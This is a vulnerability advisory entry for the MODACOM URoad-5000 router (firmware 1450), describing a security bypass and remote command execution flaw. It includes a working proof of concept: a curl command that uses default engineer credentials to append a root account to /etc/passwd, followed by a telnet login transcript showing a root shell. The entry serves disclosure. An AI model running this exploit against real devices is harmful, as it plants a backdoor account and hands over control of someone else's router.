ID
VAR-E-201106-0430
TITLE
MODACOM URoad-5000 Security Bypass Vulnerability and Remote Command Execution Vulnerability
Trust: 0.3
DESCRIPTION
MODACOM URoad-5000 is prone to a security-bypass vulnerability and a remote command-execution vulnerability.
An attacker can exploit these issues to bypass certain security restrictions and execute arbitrary commands on the affected device.
MODACOM URoad-5000 firmware version 1450 is vulnerable; other versions may also be affected.
Trust: 0.3
AFFECTED PRODUCTS
vendor: modacom | model: uroad-5000 | scope: eq | version: 1450 | Trust: 0.3
EXPLOIT
Attackers may exploit these issues by using readily available network utilities.
The following proof of concept is available:
$curl --basic -u "engineer:engineer" -d "command=echo -e \"r00t:CRYM.sLY1U1AI:0:0:Adminstrator:/:/bin/sh\" >> /etc/passwd;&SystemCommandSubmit=Apply" 192.168.100.254/goform/SystemCommand
$telnet www.example.com
Trying www.example.com.
Connected to www.example.com
modacom login: r00t
Password: boza
BusyBox v1.12.1 (2010-03-05 21:33:57 KST) built-in shell (ash)
Enter 'help' for a list of built-in commands
Trust: 0.3
PRICE
Free
Trust: 0.3
TYPE
Design Error
Trust: 0.3
CREDITS
Alex Stanev
Trust: 0.3
EXTERNAL IDS
db: BID | id: 48089 | Trust: 0.3
REFERENCES
url: http://www.modacom.co.kr | Trust: 0.3
SOURCES
db: BID | id: 48089
LAST UPDATE DATE
2022-07-27T09:40:45.481000+00:00
SOURCES UPDATE DATE
db: BID | id: 48089 | date: 2011-06-02T00:00:00
SOURCES RELEASE DATE
db: BID | id: 48089 | date: 2011-06-02T00:00:00